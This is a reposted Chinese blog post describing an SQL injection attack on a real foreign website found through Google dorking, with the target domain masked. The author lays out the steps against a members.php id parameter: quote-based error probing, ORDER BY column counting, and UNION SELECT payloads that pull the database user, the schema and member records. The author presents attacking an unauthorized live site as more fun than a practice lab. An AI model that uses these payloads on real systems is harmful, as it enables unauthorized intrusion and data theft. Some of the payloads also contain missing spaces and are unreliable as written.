实操:SQL注入国外xx网站
前言:
学了注入一段时间了,也在顺利通关过墨者靶场。不过,靶场哪有真实网站好玩?
何为sql注入?
SQL注入就是SQL+注入,不清楚可以百度。
寻找网站:
google黑语法:
谷歌搜索也蛮有意思的,打inurl自动推荐了很多关键词,比如:“inurl php id”。
为什么不用百度呢?
少,并且找的多数为国内。
①、试探
http://www.xxx.org/members.php?id=1
用单引号“'”的时候,是会报错的。
接着测试,order by 5 ,以第5列进行排列,报错。当 表<=实际列数,就不会报错。
http://www.xxx.org/members.php?id=1 order by 5
http://www.xxx.org/members.php?id=1 order by 4
由以上可知,当前表的列为4。
知道了几列,接下来就能知道回显的是哪几列。
②、联合注入
http://www.xxx.org/members.php?id=1 and false union select 1,2,3,4
回显了2,4列。
http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,database()
接下来查字典库,information_schema。
http://www.xxx.org/members.php?id=1 and false union select 1,user(),3,(selecttable_name from information_schema.tables where table_schema=database() limit0,1)
http://www.xxx.org/members.php?id=1 and false union select 1,(select id from db83231_asfaa.members limit 0,1),3,(select column_name frominformation_schema.columns where table_schema=database() andtable_name='members' limit 0,1)
concat字段查一查,member表里面到底有点啥。
http://www.xxx.org/members.php?id=1 and false union select 1,(select concat(id,nome,imagem,texto) from db83231_asfaa.members limit 0,1),3,(selectcolumn_name from information_schema.columns where table_schema=database() andtable_name='members' limit 0,1)
???
...
这是个什么网站呢?
有点意思。。。还好查的都是网站允许显示的数据,不涉及敏感数据。
sqlmap就不上了(只能查出三个数据库,没权限)。
嗯。。。到此为止。
声明:文章收集于网络,版权归原作者所有,为传播信息而发,如有侵权,请联系小编删除,谢谢!
时间:2020-02-06 21:24 来源: 转发量:次
声明:本站部分作品是由网友自主投稿和发布、编辑整理上传,对此类作品本站仅提供交流平台,转载的目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,不为其版权负责。如果您发现网站上有侵犯您的知识产权的作品,请与我们取得联系,我们会及时修改或删除。
相关文章:
- [数据挖掘]MySQL vs Redis,新时代王者的较量
- [数据挖掘]在复杂条件搜索上,为什么MySQL只能被ES吊打?
- [数据挖掘]MySQL 8.0的Public Key Retrival错误,毫无规律可言怎么
- [数据挖掘]50年长盛不衰,SQL为什么如此成功?
- [数据挖掘]吊打MySQL,MariaDB到底强在哪?
- [数据挖掘]50年长盛不衰,SQL为什么如此成功?
- [数据挖掘]为什么阿里不建议MySQL使用text类型?
- [数据挖掘]“MySQL Analytics Engine”来了
- [数据挖掘]惊了! MySQL 热冷数据分离设计还能这样!
- [数据挖掘]MySQL 的慢 SQL 该怎么优化?
相关推荐:
网友评论:
最新文章
热门文章